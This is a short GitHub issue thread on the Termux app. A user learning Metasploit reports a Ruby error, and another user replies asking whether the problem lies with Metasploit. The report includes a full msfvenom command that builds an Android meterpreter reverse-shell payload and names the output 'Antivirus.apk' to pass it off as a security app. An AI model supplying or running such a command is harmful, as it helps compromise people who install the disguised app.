### ISSUE TITLE
please help me in this issue

### ISSUE THREAD

**Issue by salmannkhw** [termux/termux-app#561]
I am learning to create payload in metasploit and getting this error
from /data/data/com.termux/files/usr/lib/ruby/2.4.0/rubygems/core_ext/kernel_require.rb:55:in `require'

After this an apk file created but of 0b size. I enter this command
./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 R > /sdcard/Antivirus.apk

**Comment by l-jonas** [comment]
@salmannkhw Isn't this related to Metasploit? Does it work in other environments (Debian/ Ubunut at a Laptop/ Desktop)?
